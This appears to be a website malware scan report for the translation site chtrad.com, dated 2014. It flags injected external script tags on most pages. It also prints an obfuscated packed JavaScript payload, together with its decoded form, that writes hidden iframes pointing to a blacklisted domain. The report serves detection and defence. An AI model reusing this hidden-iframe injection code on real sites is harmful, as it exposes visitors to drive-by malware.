Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chtrad.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chtrad.com/ | 200 OK Content-Length: 11456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146580"></script> | ||
http://chtrad.com/AC_RunActiveContent.js | 200 OK Content-Length: 787 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: 4four.mee444.com eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3(\'<1 4="5://6.7.8/9.a&h?i" b="0" c="0" d="0" e="f: g;"></1>\');2.3(\'<1 4="5://6.7.8/9.a&j?k" b="0" c="0" d="0" e="f: g;"></1>\');2.3(\'<1 4="5://6.7.8/9.a&l?m" b="0" c="0" d="0" e="f: g;"></1>\');',23,23,'|iframe|document|write|src|http|4four.mee444.com|user_login|php|border|width|height|style|visibility|hidden|MraPbaaVGq|01|JYkmCgISuq|02|JYkmCgISgh|03'.split('|'),0,{})) Decoded script: document.write('<iframe src="http://4four.mee444.com/user_login.php&MraPbaaVGq?01" border="0" width="0" height="0" style="visibility: hidden;"></iframe>');document.write('<iframe src="http://4four.mee444.com/user_login.php&JYkmCgISuq?02" border="0" width="0" height="0" style="visibility: hidden;"></iframe>');document.write('<iframe src="http://4four.mee444.com/user_login.php&JYkmCgISgh?03" border="0" width="0" height="0" style="visibility: hidden;">&l ...[1000 bytes skipped]... | ||
http://chtrad.com/main.html | 200 OK Content-Length: 10612 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146597"></script> | ||
http://chtrad.com/glavnaya.html | 200 OK Content-Length: 17989 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146585"></script> | ||
http://chtrad.com/principal.html | 200 OK Content-Length: 10732 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146606"></script> | ||
http://chtrad.com/interprete_asesor.html | 200 OK Content-Length: 8347 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146593"></script> | ||
http://chtrad.com/traduccion.html | 200 OK Content-Length: 6254 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146607"></script> | ||
http://chtrad.com/interpretacion.html | 200 OK Content-Length: 7831 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146589"></script> | ||
http://chtrad.com/nuestras_referencias.html | 200 OK Content-Length: 10332 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146600"></script> | ||
http://chtrad.com/contact_es.php | 200 OK Content-Length: 6584 Content-Type: text/html | clean |
http://chtrad.com/test404page.js | 404 Not Found Content-Length: 1808 Content-Type: text/html | clean |
http://chtrad.com/perevodcik_consultant.html | 200 OK Content-Length: 11331 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146603"></script> | ||
http://chtrad.com/pismeni_perevod.html | 200 OK Content-Length: 10205 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146604"></script> | ||
http://chtrad.com/ustni_perevod.html | 200 OK Content-Length: 14880 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146610"></script> | ||
http://chtrad.com/o_nas.html | 200 OK Content-Length: 18923 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3146601"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chtrad.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 18:49:19 GMT
Accept-Ranges: bytes
ETag: "f125c7f-2cc0-4f67ba4e13ed1"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 11456
Content-Type: text/html
Last-Modified: Mon, 07 Apr 2014 22:46:54 GMT
...11456 bytes of data.
GET / HTTP/1.1
Host: chtrad.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 18:49:19 GMT
Accept-Ranges: bytes
ETag: "f125c7f-2cc0-4f67ba4e13ed1"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 11456
Content-Type: text/html
Last-Modified: Mon, 07 Apr 2014 22:46:54 GMT
...11456 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chtrad.com
Referer: http://www.google.com/search?q=chtrad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chtrad.com
Referer: http://www.google.com/search?q=chtrad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.